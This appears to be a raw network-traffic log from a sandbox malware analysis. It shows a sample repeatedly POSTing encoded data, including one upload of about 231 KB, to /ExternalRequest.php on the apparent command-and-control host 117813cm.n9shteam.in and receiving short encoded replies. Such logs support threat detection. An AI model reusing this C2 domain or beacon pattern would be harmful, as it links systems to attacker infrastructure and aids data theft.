Nov 9, 2024 06:52:22.155508995 CET	1836	OUT	Data Raw: 5d 54 59 51 55 5b 55 5c 5a 5e 55 5a 52 53 5b 57 58 59 5a 43 51 5a 5a 59 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: ]TYQU[U\Z^UZRS[WXYZCQZZY^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV"+#"'X2T5/99/=>8,[)Y'?& /3X0''/<&Y%%Z/7
Nov 9, 2024 06:52:22.617292881 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:22.690689087 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0e 1f 23 56 2b 3e 37 1c 27 3a 0d 59 2c 0c 2d 55 25 01 20 45 2c 01 2b 01 31 04 2b 58 2d 5b 24 52 37 2b 31 5b 23 02 39 5a 3f 2c 3e 08 36 3a 2f 5a 0c 1f 20 02 3f 3d 26 59 24 10 09 04 3b 3d 0a 1d 22 37 2e 10 3f 3c 2d 16 31 10 31 5c 20 31 29 51 29 04 2a 12 2f 28 3c 5e 2f 27 2c 58 24 3f 2d 5e 0e 14 20 1b 28 58 35 05 35 23 36 59 34 0c 2b 17 23 07 2c 53 29 12 0e 08 29 38 08 58 3e 55 23 0f 22 13 27 0f 22 0c 3d 01 27 29 24 05 27 39 26 52 20 05 20 50 01 35 5c 51 Data Ascii: #V+>7':Y,-U% E,+1+X-[$R7+1[#9Z?,>6:/Z ?=&Y$;="7.?<-11\ 1)Q)*/(<^/',X$?-^ (X55#6Y4+#,S))8X>U#"'"=')$'9&R P5\Q

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:22.995464087 CET	251	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue
Nov 9, 2024 06:52:23.344829082 CET	2532	OUT	Data Raw: 58 52 5c 54 55 59 50 57 5a 5e 55 5a 52 54 5b 53 58 5f 5a 49 51 5a 5a 5d 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: XR\TUYPWZ^UZRT[SX_ZIQZZ]^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV!_+#&]32#3<.)$P?=+,!\%<#Y;'(A0/,R;&Y%%Z/+
Nov 9, 2024 06:52:23.813374996 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:23.885876894 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:24.318486929 CET	275	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Nov 9, 2024 06:52:24.671080112 CET	2532	OUT	Data Raw: 58 54 5c 50 55 5c 55 52 5a 5e 55 5a 52 57 5b 55 58 5c 5a 47 51 5f 5a 5f 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: XT\PU\URZ^UZRW[UX\ZGQ_Z_^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV!_?U6]$"W!U?,)/+/)'9U#?T''$<-<&Y%%Z/'
Nov 9, 2024 06:52:25.119189024 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:25.195760012 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:25.355669975 CET	275	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Nov 9, 2024 06:52:25.702496052 CET	2532	OUT	Data Raw: 5d 54 5c 53 50 5b 55 50 5a 5e 55 5a 52 52 5b 51 58 59 5a 45 51 5d 5a 59 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: ]T\SP[UPZ^UZRR[QXYZEQ]ZY^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV!X(6'=95?A,:4P+8-='>7Y'P%='%?8,,&Y%%Z/3
Nov 9, 2024 06:52:26.168266058 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:26.247330904 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:26.302207947 CET	277	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 231332 Expect: 100-continue Connection: Keep-Alive
Nov 9, 2024 06:52:26.666215897 CET	12360	OUT	Data Raw: 58 56 59 52 55 5d 55 5d 5a 5e 55 5a 52 50 5b 57 58 5f 5a 41 51 53 5a 5b 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: XVYRU]U]Z^UZRP[WX_ZAQSZ[^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV!^+#Z0)"#<.:=-8R/>'<7#V' 0<0U/&Y%%Z/;
Nov 9, 2024 06:52:26.671238899 CET	12360	OUT	Data Raw: 39 5b 2d 5c 38 33 04 20 31 5b 29 30 33 02 2b 3a 00 09 37 05 0f 29 1c 2c 08 5d 0a 53 2d 10 26 13 38 33 0b 25 3f 33 02 39 08 2f 05 3f 12 2e 1a 37 33 01 13 3f 3e 3f 0e 53 36 3e 5c 35 3d 55 0f 1b 38 39 02 06 39 07 35 31 0d 00 2c 3b 2b 17 08 2e 15 05 Data Ascii: 9[-\83 1[)03+:7),]S-&83%?39/?.73?>?S6>\5=U89951,;+.8!=&R$!V22!;>#.<#--',=3[#.38549&Z'06;>>/V;;8?#=7*U'"B9(&+!/5\9840<) ?4>-=_$;+5214..:8T[>:%8Y_8"U$!-823
Nov 9, 2024 06:52:26.671430111 CET	2472	OUT	Data Raw: 27 3b 23 13 04 38 14 2b 3d 5e 43 1c 29 07 51 54 28 32 0f 21 0a 56 3d 57 33 5b 23 3f 3b 5a 0b 30 30 3d 3a 04 15 04 01 5e 3c 58 2e 15 3f 31 39 58 24 2e 29 09 35 0a 5a 06 36 07 15 2b 27 2f 37 15 07 2d 3a 2a 3f 05 3a 20 23 59 06 51 3e 5a 3b 1c 3c 3e Data Ascii: ';#8+=^C)QT(2!V=W3[#?;Z00=:^<X.?19X$.)5Z6+'/7-:?: #YQ>Z;<>+$&\(#'$(5?Z?=-9;!_#7<343/.)8;#;,??-$\61;>^"Z=]> :5[6= %X>>$)Y?R)Z2<69="6#Q3211/$23 1Y31.=>09.7T'#3$Z :9\#W#-
Nov 9, 2024 06:52:26.671454906 CET	2472	OUT	Data Raw: 3d 5a 5c 18 03 04 28 1a 08 26 3d 2f 37 3e 21 52 39 3c 2d 5c 3f 32 26 2e 3e 03 32 1e 2c 5f 1d 35 03 0f 15 5f 08 39 5d 06 38 2a 3f 53 33 2e 39 07 22 09 29 30 3b 1c 20 34 39 00 3b 54 26 2e 02 0d 2a 5f 1b 5b 3d 3f 27 31 0e 05 27 11 08 31 13 2a 26 38 Data Ascii: =Z\(&=/7>!R9<-\?2&.>2,_5_9]8?S3.9")0; 49;T&._[=?'1'1&8]Y.?4<9.U:_8:> 05 9-Y<X?)?8-Y<,![!)Z:Z16!<3.#3,6",<: 3=,0$-\5)=/]9";?7?)^*%2P20.5$: 3VP:4+94<$Y4>/ %X=
Nov 9, 2024 06:52:26.671494007 CET	6180	OUT	Data Raw: 0b 2e 2b 30 36 3a 5a 02 33 29 3e 1a 38 38 2d 20 28 5f 0a 39 32 04 02 5a 3e 17 1c 5d 3c 55 12 1b 3f 31 06 2b 28 5a 2c 0e 27 17 12 23 2f 23 07 12 09 07 11 09 37 2d 33 20 39 04 4b 1a 06 3e 3f 0e 34 5f 3e 1e 37 03 00 20 3c 2b 1c 3b 0e 05 0e 3c 24 1c Data Ascii: .+06:Z3)>88- (_92Z>]<U?1+(Z,'#/#7-3 9K>?4_>7 <+;<$!?3</97,#<6Y1/&%]=!R!!/9/'7/?$9>.4["W;( W"=^+:12#7+?/=95^&:$%-=3=.0#40)>*>11#8T.%=#X;-3$[&#Z$=%4Z+.?3$C7==@U7/"
Nov 9, 2024 06:52:26.671515942 CET	1236	OUT	Data Raw: 04 32 23 17 33 36 2f 5a 2e 30 3e 2d 09 2a 27 20 2d 23 20 14 26 31 24 35 02 58 3b 16 23 5d 22 19 34 5a 5d 27 28 58 00 2f 09 3c 12 28 0d 20 02 2d 21 3c 0c 5a 38 5b 30 58 35 04 02 44 39 26 56 06 3c 3e 51 09 0c 10 0c 07 0d 36 1c 35 01 2c 35 25 2d 5f Data Ascii: 2#36/Z.0>-' -# &1$5X;#]"4Z]'(X/<( -!<Z8[0X5D9&V<>Q65,5%-_&$#'\6$8:??_:0!Z3>,22_9W?,,9"-:)>2<=(():]<'*[;.P+34'WT;?=2Y0X"!Y0 &12:7Z'[!:0<78+2''<5\' &90''XA80+%9%86="@/2803
Nov 9, 2024 06:52:26.676163912 CET	4944	OUT	Data Raw: 34 3c 5a 1c 3f 3c 33 26 3c 3e 0a 1e 07 05 3a 5d 05 5d 04 1d 21 38 29 0c 02 01 28 05 32 31 2b 1d 29 28 39 59 26 32 59 58 09 0a 2c 0f 34 2e 2c 12 30 5c 57 2f 37 56 22 54 0a 3b 33 45 36 58 3b 58 0a 02 05 15 02 21 2b 2c 38 2b 26 3d 09 20 04 28 3e 20 Data Ascii: 4<Z?<3&<>:]]!8)(21+)(9Y&2YX,4.,0\W/7V"T;3E6X;X!+,8+&= (> 1SZ$0/<-!Y?2+879'-3.U0&2!>.%<.Z/6Y(.18'3[!:#5#44,3$-8+1?2X6>!.><;,?^"_,1=;%(>>:%3?1T:">YY<,%?!-$,200R,%)4:/00
Nov 9, 2024 06:52:26.676194906 CET	2472	OUT	Data Raw: 13 2d 1c 0f 35 3c 01 1b 24 25 52 10 3c 31 2d 25 0a 10 23 3b 2f 05 16 3a 3f 0f 00 5b 04 2c 32 31 32 2f 50 5e 0c 55 1c 56 30 07 07 5e 3a 01 27 5f 33 09 37 5b 3e 28 36 27 08 01 23 09 05 04 25 19 35 30 29 3e 25 57 19 1f 34 3c 0e 1f 23 01 1e 1b 3c 24 Data Ascii: -5<$%R<1-%#;/:?[,212/P^UV0^:'_37[>(6'#%50)>%W4<#<$?6-0"1R>(,?-W>;<0:(3((*/?<5?.><4?<;19]>,!>"21'=>429;'XH,&Z<Z9R8#8;Z<B8'V_=+9%X97+3X^6]'!/780<<($<6 14?3>52X'
Nov 9, 2024 06:52:26.676227093 CET	7416	OUT	Data Raw: 35 04 04 23 0f 05 3d 56 3d 23 1a 04 33 10 33 04 3f 20 20 11 30 05 3d 35 29 35 08 3c 23 25 13 1d 07 29 0a 1c 32 02 0d 02 02 05 29 17 0a 0f 02 17 3e 32 0e 3f 32 2d 2c 51 0a 5c 20 2d 36 2e 21 1e 0a 29 5c 39 34 00 05 2b 3f 05 1a 20 35 5b 58 0c 3f 5c Data Ascii: 5#=V=#33? 0=5)5<#%)2)>2?2-,Q\ -6.!)\94+? 5[X?\!?&&9[^\#-<-7;13:;>3>R:-6<"2+=,:-3]-Y<%/1"-+;"\U49#'-3<93V'YT83.'+49?U_1(X('1*21' &\Q!Z9\>>&!>? Y.)/%?<
Nov 9, 2024 06:52:26.723743916 CET	34608	OUT	Data Raw: 2f 5e 0d 17 23 00 3b 17 34 2d 0b 5d 3b 5b 00 2f 23 3c 53 04 09 07 2f 38 3c 06 20 11 03 27 39 17 06 17 08 21 3e 1a 00 1a 30 5c 12 3c 3f 07 0a 17 30 28 2d 36 31 32 09 34 32 0c 24 0c 2b 2c 28 1c 08 3d 12 3a 38 0b 10 12 38 01 5d 43 00 2c 3b 18 3c 03 Data Ascii: /^#;4-];[/#<S/8< '9!>0\<?0(-61242$+,(=:88]C,;<(X'/?81?==/0"( -<0,Y7&Z?(Z23.!^<".Y9(:4$$Z^;&(!;3- .X3$[24%[11.?'W!8>),=;X%')3>] 8#*)'W[: '"';>>Y%<,#<

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:26.729046106 CET	275	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Nov 9, 2024 06:52:27.077356100 CET	2532	OUT	Data Raw: 58 52 5c 54 55 5e 55 55 5a 5e 55 5a 52 54 5b 54 58 5e 5a 46 51 5a 5a 59 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: XR\TU^UUZ^UZRT[TX^ZFQZZY^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV!_)#2$.1#0':$<> 8-!0,.!/+U'$$,<,<&Y%%Z/+
Nov 9, 2024 06:52:27.533042908 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:27.609724998 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[
Nov 9, 2024 06:52:27.704722881 CET	251	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 1836 Expect: 100-continue
Nov 9, 2024 06:52:27.935662031 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:27.935874939 CET	1836	OUT	Data Raw: 58 56 59 52 50 59 50 50 5a 5e 55 5a 52 54 5b 50 58 54 5a 45 51 5c 5a 58 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: XVYRPYPPZ^UZRT[PXTZEQ\ZX^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV"+-3-#3E-4T?.,-*37?3T$0F$?8R8&Y%%Z/+
Nov 9, 2024 06:52:28.238771915 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0e 1f 23 1f 28 3e 2b 55 33 2a 2b 10 3b 0c 04 0c 26 06 2c 44 38 3f 0d 05 26 2d 28 00 2d 3d 28 56 23 2b 25 59 20 5a 3e 03 28 12 2a 0f 22 2a 2f 5a 0c 1f 23 12 3c 13 2d 01 24 2e 06 1e 2c 2d 3f 42 23 0e 25 01 2b 3f 25 53 26 00 21 17 20 0f 21 53 3e 03 36 5b 2e 05 34 16 2c 24 2c 58 31 2f 2d 5e 0e 14 23 0f 2b 3e 2d 03 35 20 3e 5b 34 21 37 15 20 10 2c 56 3d 02 0d 56 2b 28 3e 5a 28 33 3b 0b 23 3e 33 0f 23 22 21 04 24 29 20 00 27 29 26 52 20 05 20 50 01 35 5c 51 Data Ascii: #(>+U3+;&,D8?&-(-=(V#+%Y Z>("*/Z#<-$.,-?B#%+?%S&! !S>6[.4,$,X1/-^#+>-5 >[4!7 ,V=V+(>Z(3;#>3#"!$) ')&R P5\Q

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:27.738181114 CET	251	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 2532 Expect: 100-continue
Nov 9, 2024 06:52:28.093043089 CET	2532	OUT	Data Raw: 5d 53 5c 57 55 5e 55 5c 5a 5e 55 5a 52 57 5b 54 58 5d 5a 46 51 52 5a 5f 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: ]S\WU^U\Z^UZRW[TX]ZFQRZ_^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV"+#%'--"#:(=>#8=!$,> ,'U0.G38-,&Y%%Z/'
Nov 9, 2024 06:52:28.547483921 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:28.626882076 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3c 57 5a 5b Data Ascii: <WZ[